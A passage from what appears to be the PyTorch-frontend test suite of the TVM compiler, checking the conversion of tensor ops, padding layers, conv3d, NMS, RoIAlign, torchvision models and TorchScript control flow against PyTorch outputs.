            return torch.norm(args[0], p=float(-0.5), dim=(1, 2), keepdim=True)
    class Norm10(Module):
        def forward(self, *args):
            return torch.norm(args[0], p=float(-2), dim=(1), keepdim=False)
    input_data = torch.rand(input_shape).float()
    verify_model(Norm1().float().eval(), input_data=input_data)
    verify_model(Norm2().float().eval(), input_data=input_data)
    verify_model(Norm3().float().eval(), input_data=input_data)
    verify_model(Norm4().float().eval(), input_data=input_data)
    verify_model(Norm5().float().eval(), input_data=input_data)
    verify_model(Norm6().float().eval(), input_data=input_data)
    verify_model(Norm7().float().eval(), input_data=input_data)
    verify_model(Norm8().float().eval(), input_data=input_data)
    verify_model(Norm9().float().eval(), input_data=input_data)
    verify_model(Norm10().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_frobenius_norm():
    """Exercise torch.norm in its default and explicit "fro" (Frobenius) forms."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class FroNorm1(Module):
        def forward(self, *args):
            return torch.norm(args[0])
    class FroNorm2(Module):
        def forward(self, *args):
            return torch.norm(args[0], p="fro", dim=None, keepdim=True)
    class FroNorm3(Module):
        def forward(self, *args):
            return torch.norm(args[0], p="fro", dim=(1), keepdim=True)
    class FroNorm4(Module):
        def forward(self, *args):
            return torch.norm(args[0], dim=None, keepdim=False)
    input_data = torch.rand(input_shape).float()
    verify_model(FroNorm1().float().eval(), input_data=input_data)
    verify_model(FroNorm2().float().eval(), input_data=input_data)
    verify_model(FroNorm3().float().eval(), input_data=input_data)
    verify_model(FroNorm4().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_sigmoid():
    """Exercise torch.nn.Sigmoid on a 4-D random input."""
    torch.set_grad_enabled(False)
    inp = torch.rand([1, 3, 10, 10]).float()
    verify_model(torch.nn.Sigmoid().eval(), input_data=inp)
@tvm.testing.uses_gpu
def test_forward_dense():
    """Exercise torch.nn.Linear (with and without bias) and check the converted
    Relay graph contains no "multiply" op."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Dense1(Module):
        def __init__(self):
            super(Dense1, self).__init__()
            self.linear = torch.nn.Linear(10, 7, bias=True)
        def forward(self, *args):
            return self.linear(args[0][0, 0])
    class Dense2(Module):
        def __init__(self):
            super(Dense2, self).__init__()
            self.linear = torch.nn.Linear(10, 7, bias=False)
        def forward(self, *args):
            return self.linear(args[0][0, 0])
    input_data = torch.rand(input_shape).float()
    verify_model(Dense1().float().eval(), input_data=input_data)
    verify_model(Dense2().float().eval(), input_data=input_data)
    # The linear layer should lower to a dense op, not an elementwise multiply.
    trace = torch.jit.trace(Dense1(), [input_data])
    mod, params = relay.frontend.from_pytorch(
        trace,
        [("input", input_shape)],
    )
    assert not any([op.name == "multiply" for op in list_ops(mod["main"])])
@tvm.testing.uses_gpu
def test_forward_dropout():
    """Exercise Dropout/Dropout2d/Dropout3d/AlphaDropout in eval mode (identity behavior)."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(torch.nn.Dropout(p=0.5).eval(), input_data=input_data[0, 0])
    verify_model(torch.nn.Dropout2d(p=0.5).eval(), input_data=input_data[0])
    verify_model(torch.nn.Dropout3d(p=0.5).eval(), input_data=input_data)
    verify_model(torch.nn.AlphaDropout(p=0.5).eval(), input_data=input_data[0, 0])
@tvm.testing.uses_gpu
def test_forward_slice():
    """Exercise tensor slicing: basic, negative bounds, tensor-valued bounds, and strides."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Slice1(Module):
        def forward(self, *args):
            return args[0][:, :, :, :3]
    class Slice2(Module):
        def forward(self, *args):
            return args[0][0, :, :-3, :]
    class Slice3(Module):
        def forward(self, *args):
            # Slice bounds computed from scalar tensors.
            x0 = torch.tensor(2) - torch.tensor(1)
            x1 = torch.tensor(3) + torch.tensor(1)
            return args[0][:, x0:, 1:x1, :]
    class SliceWithStride(torch.nn.Module):
        def forward(self, x):
            return x[..., 0::2] + x[..., 1::2]
    class SliceWithStride2(torch.nn.Module):
        def forward(self, x):
            return x[0::2, 0::2] + x[1::2, 1::2]
    input_data = torch.rand(input_shape).float()
    verify_model(Slice1(), input_data=input_data)
    verify_model(Slice2(), input_data=input_data)
    verify_model(Slice3(), input_data=input_data)
    verify_model(SliceWithStride(), input_data=torch.randn(1, 4))
    verify_model(SliceWithStride2(), input_data=torch.randn(4, 4))
@tvm.testing.uses_gpu
def test_forward_mean():
    """Exercise Tensor.mean over a single dimension."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Mean1(Module):
        def forward(self, *args):
            return args[0].mean(2)
    input_data = torch.rand(input_shape).float()
    verify_model(Mean1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_expand():
    """Exercise Tensor.expand with -1 (keep dim) entries and with broadcasting a size-1 dim."""
    torch.set_grad_enabled(False)
    class Expand1(Module):
        def forward(self, *args):
            return args[0].expand((3, -1, -1, -1))
    input_shape = [1, 3, 10, 10]
    input_data = torch.rand(input_shape).float()
    verify_model(Expand1().float().eval(), input_data=input_data)
    class Expand2(Module):
        def forward(self, *args):
            return args[0].expand((3, 3, 3, 1))
    input_shape = [3, 1]
    input_data = torch.rand(input_shape).float()
    verify_model(Expand2().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_pow():
    """Exercise the ** operator (tensor ** scalar)."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]
    class Pow1(Module):
        def forward(self, *args):
            return args[0] ** 2
    input_data = torch.rand(input_shape).float()
    verify_model(Pow1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_chunk():
    """Exercise Tensor.chunk followed by torch.cat, which should round-trip the input."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 14, 14]
    class Chunk1(Module):
        def forward(self, *args):
            chunks = args[0].chunk(7, 2)
            return torch.cat(chunks, 2)
    input_data = torch.rand(input_shape).float()
    verify_model(Chunk1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_upsample():
    """Exercise F.interpolate with nearest and bilinear modes, via size or scale_factor."""
    class Upsample(Module):
        def __init__(self, size=None, scale=None, mode="nearest", align_corners=None):
            super().__init__()
            self.size = size
            self.scale = scale
            self.mode = mode
            self.align_corners = align_corners
        def forward(self, x):
            return torch.nn.functional.interpolate(
                x,
                size=self.size,
                scale_factor=self.scale,
                mode=self.mode,
                align_corners=self.align_corners,
            )
    inp = torch.rand((1, 3, 32, 32))
    verify_model(Upsample(size=(64, 64), mode="nearest"), inp)
    verify_model(Upsample(scale=2, mode="nearest"), inp)
    verify_model(Upsample(size=(50, 50), mode="nearest"), inp)
    verify_model(Upsample(size=(64, 64), mode="bilinear", align_corners=True), inp)
    verify_model(Upsample(scale=2, mode="bilinear", align_corners=True), inp)
    verify_model(Upsample(size=(50, 50), mode="bilinear", align_corners=True), inp)
@tvm.testing.uses_gpu
def test_to():
    """ test for aten::to(...) """
    class ToCPU(Module):
        def forward(self, x):
            # Device move only, dtype unchanged.
            return x.to("cpu")
    class ToFloat(Module):
        def forward(self, x):
            return x.float()
    class ToInt(Module):
        def forward(self, x):
            return x.int()
    class ToLong(Module):
        def forward(self, x):
            return x.long()
    class ToDouble(Module):
        def forward(self, x):
            return x.double()
    class ToFloat16(Module):
        def forward(self, x):
            return x.to(torch.float16)
    verify_model(ToCPU().eval(), torch.rand((1, 3, 32, 32)))
    verify_model(ToFloat().eval(), torch.zeros((1, 3, 32, 32), dtype=torch.int))
    verify_model(ToFloat().eval(), torch.tensor(2, dtype=torch.int))
    verify_model(ToInt().eval(), torch.zeros((1, 3, 32, 32)))
    verify_model(ToInt().eval(), torch.tensor(0.8))
    verify_model(ToLong().eval(), torch.tensor(0.8))
    verify_model(ToDouble().eval(), torch.tensor(0.8))
    verify_model(ToFloat16().eval(), torch.tensor(2, dtype=torch.float32))
    verify_model(ToFloat16().eval(), torch.zeros((1, 3, 32, 32), dtype=torch.int))
@tvm.testing.uses_gpu
def test_adaptive_pool3d():
    """Exercise AdaptiveMaxPool3d/AdaptiveAvgPool3d with several output sizes and input shapes."""
    for ishape in [(1, 32, 16, 16, 16), (1, 32, 9, 15, 15), (1, 32, 13, 7, 7)]:
        inp = torch.rand(ishape)
        verify_model(torch.nn.AdaptiveMaxPool3d((1, 1, 1)).eval(), inp)
        verify_model(torch.nn.AdaptiveMaxPool3d((2, 2, 2)).eval(), inp)
        verify_model(torch.nn.AdaptiveAvgPool3d((1, 1, 1)).eval(), inp)
        verify_model(torch.nn.AdaptiveAvgPool3d((2, 2, 2)).eval(), inp)
        verify_model(torch.nn.AdaptiveAvgPool3d((4, 8, 8)).eval(), inp)
        verify_model(torch.nn.AdaptiveMaxPool3d((7, 8, 9)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_functional_pad():
    """Exercise torch.nn.functional.pad with 1-D, 2-D, and 3-D constant pad tuples."""
    torch.set_grad_enabled(False)
    pad = (0, 0)
    class Pad1(Module):
        def forward(self, *args):
            # `pad` is a free variable of the enclosing function: rebinding it
            # below changes the padding that each trace sees.
            return torch.nn.functional.pad(args[0], pad, "constant", 0)
    input_data = torch.rand((3, 3, 4, 2))
    pad = (1, 1)
    verify_model(Pad1().float().eval(), input_data=input_data)
    pad = (1, 1, 2, 2)
    verify_model(Pad1().float().eval(), input_data=input_data)
    pad = (0, 1, 2, 1, 3, 3)
    verify_model(Pad1().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_zero_pad2d():
    """Exercise torch.nn.ZeroPad2d with symmetric and asymmetric padding."""
    inp = torch.rand((1, 1, 3, 3))
    verify_model(torch.nn.ZeroPad2d(2).eval(), inp)
    verify_model(torch.nn.ZeroPad2d((1, 1, 2, 0)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_constant_pad1d():
    """Exercise torch.nn.ConstantPad1d with symmetric and asymmetric padding.

    Fix: the original instantiated ConstantPad2d (a copy-paste slip from the
    2-D test below); a 1-D pad test must exercise ConstantPad1d.
    """
    inp = torch.rand((1, 2, 4))
    # Pad 2 on both ends of the last dim, filled with 3.5.
    verify_model(torch.nn.ConstantPad1d(2, 3.5).eval(), inp)
    inp = torch.rand((1, 2, 3))
    # Asymmetric: 3 on the left, 1 on the right.
    verify_model(torch.nn.ConstantPad1d((3, 1), 3.5).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_constant_pad2d():
    """Exercise torch.nn.ConstantPad2d with symmetric and per-side padding."""
    inp = torch.rand((1, 2, 2, 2))
    verify_model(torch.nn.ConstantPad2d(2, 3.5).eval(), inp)
    verify_model(torch.nn.ConstantPad2d((3, 0, 2, 1), 3.5).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_constant_pad3d():
    """Exercise torch.nn.ConstantPad3d with symmetric and per-side padding."""
    inp = torch.rand((1, 3, 2, 2, 2))
    verify_model(torch.nn.ConstantPad3d(3, 3.5).eval(), inp)
    verify_model(torch.nn.ConstantPad3d((3, 4, 5, 6, 0, 1), 3.5).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_reflection_pad1d():
    """Exercise torch.nn.ReflectionPad1d with symmetric and asymmetric padding."""
    inp = torch.rand((1, 2, 4))
    verify_model(torch.nn.ReflectionPad1d(2).eval(), inp)
    verify_model(torch.nn.ReflectionPad1d((3, 1)).eval(), inp)
    inp = torch.rand((2, 4, 5))
    verify_model(torch.nn.ReflectionPad1d((2, 3)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_reflection_pad2d():
    """Exercise torch.nn.ReflectionPad2d with symmetric and per-side padding."""
    inp = torch.rand((1, 1, 3, 3))
    verify_model(torch.nn.ReflectionPad2d(2).eval(), inp)
    verify_model(torch.nn.ReflectionPad2d((1, 1, 2, 0)).eval(), inp)
    inp = torch.rand((2, 4, 5, 6))
    verify_model(torch.nn.ReflectionPad2d((1, 3, 2, 4)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_replication_pad1d():
    """Exercise torch.nn.ReplicationPad1d with symmetric and asymmetric padding."""
    inp = torch.rand((1, 2, 4))
    verify_model(torch.nn.ReplicationPad1d(2).eval(), inp)
    verify_model(torch.nn.ReplicationPad1d((3, 1)).eval(), inp)
    inp = torch.rand((2, 4, 5))
    verify_model(torch.nn.ReplicationPad1d((2, 3)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_replication_pad2d():
    """Exercise torch.nn.ReplicationPad2d with symmetric and per-side padding."""
    inp = torch.rand((1, 1, 3, 3))
    verify_model(torch.nn.ReplicationPad2d(2).eval(), inp)
    verify_model(torch.nn.ReplicationPad2d((1, 1, 2, 0)).eval(), inp)
    inp = torch.rand((2, 4, 5, 6))
    verify_model(torch.nn.ReplicationPad2d((1, 3, 2, 4)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_replication_pad3d():
    """Exercise torch.nn.ReplicationPad3d with symmetric and per-side padding."""
    inp = torch.rand((1, 1, 3, 3, 3))
    verify_model(torch.nn.ReplicationPad3d(3).eval(), inp)
    verify_model(torch.nn.ReplicationPad3d((1, 1, 2, 2, 1, 1)).eval(), inp)
    inp = torch.rand((7, 5, 4, 5, 6))
    verify_model(torch.nn.ReplicationPad3d((2, 3, 2, 5, 1, 4)).eval(), inp)
@tvm.testing.uses_gpu
def test_forward_upsample3d():
    """Exercise torch.nn.Upsample on a 5-D input: nearest and trilinear modes."""
    inp = torch.arange(1, 9, dtype=torch.float32).view(1, 1, 2, 2, 2)
    verify_model(torch.nn.Upsample(scale_factor=2, mode="nearest").eval(), inp)
    verify_model(torch.nn.Upsample(scale_factor=2, mode="trilinear").eval(), inp)
    verify_model(
        torch.nn.Upsample(scale_factor=2, mode="trilinear", align_corners=True).eval(), inp
    )
def test_forward_nms():
    """dynamic Non-Maximum Suppression"""
    torch.set_grad_enabled(False)
    class NonMaxSupression(Module):
        def __init__(self, iou_thres):
            super().__init__()
            self.iou_threshold = iou_thres
        def forward(self, *args):
            # args[0]: boxes in (x1, y1, x2, y2), args[1]: scores.
            return torchvision.ops.nms(args[0], args[1], self.iou_threshold)
    # Generate random input data
    def _gen_rand_inputs(num_boxes):
        box_len = 4
        boxes = torch.rand(num_boxes, box_len, dtype=torch.float) * 0.5
        # Make x2 >= x1 and y2 >= y1 so every box is valid.
        boxes[:, 2] += boxes[:, 0]
        boxes[:, 3] += boxes[:, 1]
        scores = torch.rand(num_boxes, dtype=torch.float)
        return boxes, scores
    targets = ["llvm"]  # dynamic nms does not work on gpu
    for num_boxes, iou_thres in [(10, 0.3), (100, 0.5), (500, 0.9)]:
        in_boxes, in_scores = _gen_rand_inputs(num_boxes)
        verify_trace_model(NonMaxSupression(iou_thres), [in_boxes, in_scores], targets)
def test_forward_roi_align():
    """ROI align"""
    torch.set_grad_enabled(False)
    class ROIAlgin(Module):
        def __init__(self, output_sizes, spatial_scale=1.0, sampling_ratio=-1):
            super().__init__()
            self.spatial_scale = spatial_scale
            self.sampling_ratio = sampling_ratio
            self.output_sizes = output_sizes
        def forward(self, *args):
            return torchvision.ops.roi_align(
                args[0],
                args[1],
                self.output_sizes,
                self.spatial_scale,
                self.sampling_ratio,
            )
    in_data = torch.Tensor(np.random.uniform(size=(1, 8, 100, 100)))
    in_boxes = torch.Tensor(np.random.uniform(0.0, 100.0, size=(35, 4)))
    # Prepend the batch index column expected by roi_align's box format.
    in_batch = torch.zeros((35, 1), dtype=torch.float)
    in_boxes = torch.cat([in_batch, in_boxes], dim=1)
    verify_model(ROIAlgin(7), [in_data, in_boxes])
    verify_model(ROIAlgin((10, 10), 0.7, 5), [in_data, in_boxes])
    verify_model(ROIAlgin(15, 0.9, 3), [in_data, in_boxes])
@tvm.testing.uses_gpu
def test_conv3d():
    """Exercise torch.nn.Conv3d with several kernels, padding, and a strided downsample.

    Fix: removed the stray trailing commas after the first two verify_model
    calls, which made those statements build throwaway one-element tuples.
    """
    for ishape in [(1, 32, 16, 16, 16), (1, 32, 9, 15, 15), (1, 32, 13, 7, 7)]:
        inp = torch.rand(ishape)
        verify_model(torch.nn.Conv3d(32, 16, (3, 3, 3), padding=(1, 1, 1)).eval(), inp)
        verify_model(torch.nn.Conv3d(32, 16, (5, 5, 5), padding=(2, 2, 2)).eval(), inp)
        verify_model(torch.nn.Conv3d(32, 16, kernel_size=1).eval(), inp)
        # downsample
        verify_model(torch.nn.Conv3d(32, 16, kernel_size=1, stride=2).eval(), inp)
@tvm.testing.uses_gpu
def test_conv3d_transpose():
    """Exercise torch.nn.ConvTranspose3d over several input shapes and kernel configs.

    Fix: removed the stray trailing commas after the first two verify_model
    calls, which made those statements build throwaway one-element tuples.
    """
    for ishape in [(1, 8, 10, 5, 10), (1, 8, 5, 8, 8), (1, 8, 13, 7, 7)]:
        inp = torch.rand(ishape)
        verify_model(
            torch.nn.ConvTranspose3d(
                in_channels=8, out_channels=33, kernel_size=3, stride=2
            ).eval(),
            inp,
        )
        verify_model(
            torch.nn.ConvTranspose3d(
                in_channels=8,
                out_channels=20,
                kernel_size=(3, 5, 2),
                stride=(2, 1, 1),
                padding=(0, 4, 2),
            ).eval(),
            inp,
        )
        verify_model(
            torch.nn.ConvTranspose3d(in_channels=8, out_channels=20, kernel_size=1).eval(), inp
        )
        verify_model(
            torch.nn.ConvTranspose3d(in_channels=8, out_channels=5, kernel_size=1, stride=2).eval(),
            inp,
        )
# Model tests
@tvm.testing.uses_gpu
def test_resnet18():
    """End-to-end check of the torchvision resnet18 model."""
    torch.set_grad_enabled(False)
    verify_model("resnet18", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_squeezenet1_0():
    """End-to-end check of the torchvision squeezenet1_0 model."""
    torch.set_grad_enabled(False)
    verify_model("squeezenet1_0", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_squeezenet1_1():
    """End-to-end check of the torchvision squeezenet1_1 model."""
    torch.set_grad_enabled(False)
    verify_model("squeezenet1_1", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_densenet121():
    """End-to-end check of the torchvision densenet121 model."""
    torch.set_grad_enabled(False)
    verify_model("densenet121", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_inception_v3():
    """End-to-end check of the torchvision inception_v3 model."""
    torch.set_grad_enabled(False)
    verify_model("inception_v3", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_googlenet():
    """End-to-end check of the torchvision googlenet model."""
    torch.set_grad_enabled(False)
    verify_model("googlenet", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_mnasnet0_5():
    """End-to-end check of the torchvision mnasnet0_5 model."""
    torch.set_grad_enabled(False)
    verify_model("mnasnet0_5", atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_mobilenet_v2():
    """End-to-end check of the torchvision mobilenet_v2 model."""
    torch.set_grad_enabled(False)
    verify_model("mobilenet_v2", atol=1e-4, rtol=1e-4)
"""
#TODO: Fix VGG and AlexNet issues (probably due to pooling)
@tvm.testing.uses_gpu
def test_alexnet():
torch.set_grad_enabled(False)
verify_model("alexnet")
@tvm.testing.uses_gpu
def test_vgg11():
torch.set_grad_enabled(False)
verify_model("vgg11")
@tvm.testing.uses_gpu
def test_vgg11_bn():
torch.set_grad_enabled(False)
verify_model("vgg11_bn")
"""
@tvm.testing.uses_gpu
def test_custom_conversion_map():
    """Test supplying a user-defined converter (custom_convert_map) for an op
    the frontend does not handle natively: torchvision::roi_align is mapped to
    relay.op.vision.roi_align.
    """

    def get_roi_align():
        # Build an RoIAlign module plus (features, rois) inputs.
        pool_size = 5
        n_channels = 2 * (pool_size ** 2)
        x = torch.rand(2, n_channels, 10, 10)
        rois = torch.tensor(
            [
                [0, 0, 0, 9, 9],  # format is (xyxy)
                [0, 0, 5, 4, 9],
                [0, 5, 5, 9, 9],
                [1, 0, 0, 9, 9],
            ],
            dtype=torch.float,
        )
        roi_align = torchvision.ops.RoIAlign(pool_size, spatial_scale=1, sampling_ratio=-1)
        return roi_align.eval(), [x, rois]

    def convert_roi_align():
        # Converter factory: returns an _impl with the (inputs, input_types)
        # signature expected by the frontend's custom conversion map.
        def _impl(inputs, input_types):
            spatial_scale = inputs[2]
            pooled_size = (inputs[3], inputs[4])
            sampling_ratio = inputs[5]
            return relay.op.vision.roi_align(
                inputs[0], inputs[1], pooled_size, spatial_scale, sampling_ratio
            )

        return _impl

    custom_map = {"torchvision::roi_align": convert_roi_align()}
    model, inputs = get_roi_align()
    verify_model(model, inputs, custom_map)
@tvm.testing.uses_gpu
def test_segmentaton_models():
    # NOTE(review): function name has a typo ("segmentaton"); kept as-is since
    # it may be referenced by name elsewhere in the file (e.g. a __main__ list).
    """Test conversion of torchvision segmentation models (FCN-ResNet101 and
    DeepLabV3-ResNet101), unwrapping their dict output to the "out" tensor.
    """

    class SegmentationModelWrapper(Module):
        def __init__(self, model):
            super().__init__()
            self.model = model

        def forward(self, inp):
            out = self.model(inp)
            # Segmentation models return an OrderedDict; keep only "out".
            return out["out"]

    fcn = torchvision.models.segmentation.fcn_resnet101(pretrained=True)
    deeplab = torchvision.models.segmentation.deeplabv3_resnet101(pretrained=True)
    inp = [torch.rand((1, 3, 300, 300), dtype=torch.float)]
    verify_model(SegmentationModelWrapper(fcn.eval()), inp, atol=1e-4, rtol=1e-4)
    verify_model(SegmentationModelWrapper(deeplab.eval()), inp, atol=1e-4, rtol=1e-4)
@tvm.testing.uses_gpu
def test_3d_models():
    """Test conversion of a video (3D) model: torchvision r3d_18."""
    input_shape = (1, 3, 4, 56, 56)
    resnet3d = torchvision.models.video.r3d_18(pretrained=True).eval()
    verify_model(resnet3d, [torch.rand(input_shape)], atol=1e-4, rtol=1e-4)
def _get_default_vm_targets():
    """Return the target strings of all TVM targets enabled for this test run."""
    return [tgt for (tgt, _) in tvm.testing.enabled_targets()]
def verify_script_model(pt_model, ishapes, targets):
    """Script pt_model with torch.jit.script and verify it via the Relay VM."""
    script_module = torch.jit.script(pt_model)
    verify_model_vm(script_module, ishapes, targets=targets)
def verify_trace_model(pt_model, idata, targets):
    """Trace pt_model with torch.jit.trace on idata and verify it via the Relay VM."""
    traced_model = torch.jit.trace(pt_model, idata)
    ishapes = [data.shape for data in idata]
    verify_model_vm(traced_model, ishapes, idata=idata, targets=targets)
def verify_model_vm(input_model, ishapes, idtype=torch.float, idata=None, targets=None):
    """Compile a (scripted/traced) PyTorch model with the Relay VM executor and
    compare its output against the PyTorch result on each requested target.

    Parameters
    ----------
    input_model : a torch.jit.ScriptModule to convert.
    ishapes : list of input shapes, one per model input.
    idtype : dtype used when random inputs are generated.
    idata : optional list of concrete input tensors; random data is generated
        when not given.
    targets : list of TVM target strings; defaults to ["llvm"].

    Fixes vs. original:
    - ``targets=["llvm"]`` was a mutable default argument; replaced with a
      ``None`` sentinel (behavior unchanged for callers).
    - ``idata if idata else ...`` treated an explicitly-passed empty list as
      "not provided"; now tests ``is not None``.
    """
    if targets is None:
        targets = ["llvm"]
    input_names = ["i{}".format(idx) for idx, ish in enumerate(ishapes)]
    input_shapes = list(zip(input_names, ishapes))
    input_data = idata if idata is not None else [torch.randn(shape, dtype=idtype) for shape in ishapes]
    # Compile via VM
    mod, params = relay.frontend.from_pytorch(input_model, input_shapes)
    for tgt in targets:
        print("Running on target", tgt)
        ctx = tvm.context(tgt, 0)
        executor = relay.create_executor("vm", mod=mod, ctx=ctx, target=tgt)
        evaluator = executor.evaluate()
        # Inference: bind each input tensor to its generated parameter name.
        for name, inp in zip(input_names, input_data):
            params[name] = inp.numpy()
        vm_res = evaluator(**params)
        # Baseline result from PyTorch itself.
        with torch.no_grad():
            pt_result = input_model(*input_data)
        # Verify the accuracy; scalar (non-tensor) results compare exactly.
        if not isinstance(pt_result, torch.Tensor):
            tvm_res = vm_res.asnumpy().item()
            assert pt_result == tvm_res
        else:
            tvm.testing.assert_allclose(vm_res.asnumpy(), pt_result.numpy(), rtol=1e-5, atol=1e-5)
@tvm.testing.uses_gpu
def test_control_flow():
    """Test TorchScript control-flow conversion (if/else, for, while, nesting).

    NOTE: each Module body below is compiled by torch.jit.script (via
    verify_script_model), so the exact statement structure is the thing being
    tested — do not restyle these forward() bodies.
    """

    class SimpleIf(torch.nn.Module):
        def __init__(self, N, M):
            super().__init__()
            self.weight = torch.nn.Parameter(torch.rand(N, M))

        def forward(self, inp):
            if inp.sum() > 0.0:
                output = self.weight + inp
            else:
                output = self.weight - inp
            return output

    class NestedIf(torch.nn.Module):
        def __init__(self, N, M):
            super().__init__()
            self.weight = torch.nn.Parameter(torch.rand(N, M))

        def forward(self, inp):
            if inp.sum() > 0.0:
                if inp.mean() > 0.0:
                    output = self.weight + inp
                else:
                    output = self.weight - inp
            else:
                if inp.mean() >= 0.0:
                    output = self.weight * inp
                else:
                    output = self.weight / inp
            return output

    class ScalarLoop(torch.nn.Module):
        def forward(self, inp):
            a = 0
            for i in range(inp.size(0)):
                b = i * i
                b = b + 1
                a += b
            if a != 0:
                a += 1
            else:
                a += 2
            return a

    class SimpleLoop(torch.nn.Module):
        def forward(self, inp):
            a = inp
            for i in range(inp.size(0)):
                b = a * 2.0
                c = a + b
                a += c
            return a

    class LoopWithIf(torch.nn.Module):
        def forward(self, inp):
            a = inp
            for i in range(inp.size(0)):
                b = a * 2.0
                b = a + b
                if b.sum() > 0.0:
                    a += b
                else:
                    a -= b
            return a

    class NestedLoop(torch.nn.Module):
        def forward(self, inp):
            a = inp
            for i in range(inp.size(0)):
                b = a * float(i)
                for j in range(inp.size(1)):
                    a += b * float(j)
            return a

    class SimpleScalarWhileLoop(torch.nn.Module):
        def forward(self, inp):
            a = 1
            i = 0
            while i <= inp.size(0):
                a += i
                i += 2
            i = 0
            # also test constant init cond
            while i < 10:
                a += i
                i += 3
            return a

    class SimpleWhileLoop(torch.nn.Module):
        def forward(self, inp):
            a = inp
            i = 0
            while i < inp.size(0):
                a += a * float(i) * 2.0
                i += 1
            return a

    models = [
        SimpleIf(10, 20),
        NestedIf(10, 20),
        ScalarLoop(),
        SimpleLoop(),
        LoopWithIf(),
        SimpleScalarWhileLoop(),
        SimpleWhileLoop(),
        NestedLoop(),
    ]
    for pt_model in models:
        verify_script_model(pt_model.eval(), [(10, 20)], _get_default_vm_targets())
@tvm.testing.uses_gpu
def test_simple_rnn():
    """Test a mixed traced-and-scripted RNN loop.

    The mixed tracing and scripting example from
    https://pytorch.org/tutorials/beginner/Intro_to_TorchScript_tutorial.html#mixing-scripting-and-tracing
    """

    class DecisionGate(torch.nn.Module):
        def forward(self, x):
            if x.sum() > 0:
                return x
            else:
                return -x

    class Cell(torch.nn.Module):
        def __init__(self, dg):
            super(Cell, self).__init__()
            self.dg = dg
            self.linear = torch.nn.Linear(4, 4)

        def forward(self, x, h):
            new_h = torch.tanh(self.dg(self.linear(x)) + h)
            return new_h, new_h

    class RNNLoop(torch.nn.Module):
        def __init__(self):
            super().__init__()
            x = torch.rand(10, 4, dtype=torch.float)
            h = torch.rand(10, 4, dtype=torch.float)
            # The cell is traced here; the outer loop below is scripted.
            self.cell = torch.jit.trace(Cell(DecisionGate()), (x, h))

        def forward(self, xs):
            h = torch.zeros(10, 4, dtype=torch.float)
            y = torch.zeros(10, 4, dtype=torch.float)
            for i in range(xs.size(0)):
                y, h = self.cell(xs[i], h)
            return y

    verify_script_model(RNNLoop().eval(), [(10, 10, 4)], _get_default_vm_targets())
@tvm.testing.uses_gpu
def test_forward_reduce_sum():
    """Test conversion of Tensor.sum with positional/keyword dim and keepdim."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class ReduceSum1(Module):
        def forward(self, *args):
            return args[0].sum(1)

    class ReduceSum2(Module):
        def forward(self, *args):
            return args[0].sum(dim=1, keepdim=False)

    class ReduceSum3(Module):
        def forward(self, *args):
            return args[0].sum(dim=2, keepdim=True)

    class ReduceSum4(Module):
        def forward(self, *args):
            return args[0].sum(dim=(2, 3), keepdim=True)

    class ReduceSum5(Module):
        def forward(self, *args):
            return args[0].sum(dim=(2, 3), keepdim=False)

    input_data = torch.rand(input_shape).float()
    verify_model(ReduceSum1().float().eval(), input_data=input_data)
    verify_model(ReduceSum2().float().eval(), input_data=input_data)
    verify_model(ReduceSum3().float().eval(), input_data=input_data)
    verify_model(ReduceSum4().float().eval(), input_data=input_data)
    verify_model(ReduceSum5().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_reduce_prod():
    """Test conversion of Tensor.prod with positional/keyword dim and keepdim."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class ReduceProd1(Module):
        def forward(self, *args):
            return args[0].prod(1)

    class ReduceProd2(Module):
        def forward(self, *args):
            return args[0].prod(dim=1, keepdim=False)

    class ReduceProd3(Module):
        def forward(self, *args):
            return args[0].prod(dim=2, keepdim=True)

    input_data = torch.rand(input_shape).float()
    verify_model(ReduceProd1().float().eval(), input_data=input_data)
    verify_model(ReduceProd2().float().eval(), input_data=input_data)
    verify_model(ReduceProd3().float().eval(), input_data=input_data)
@tvm.testing.uses_gpu
def test_forward_argmin():
    """Test conversion of Tensor.argmin with positional/keyword dim and keepdim."""
    torch.set_grad_enabled(False)
    input_shape = [1, 3, 10, 10]

    class ArgMin1(Module):
        def forward(self, *args):
            return args[0].argmin(1)

    class ArgMin2(Module):
        def forward(self, *args):
            return args[0].argmin(dim=1, keepdim=False)

    class ArgMin3(Module):
        def forward(self, *args):
            return args[0].argmin(dim=2, keepdim=True)

    input_data = torch.rand(input_shape).float()
    verify_model(ArgMin1().float().eval(), input_data=input_data)
    verify_model(ArgMin2().float().eval(), input_data=input_data)
    verify_model(ArgMin3().float().eval(), input_data=input_data)
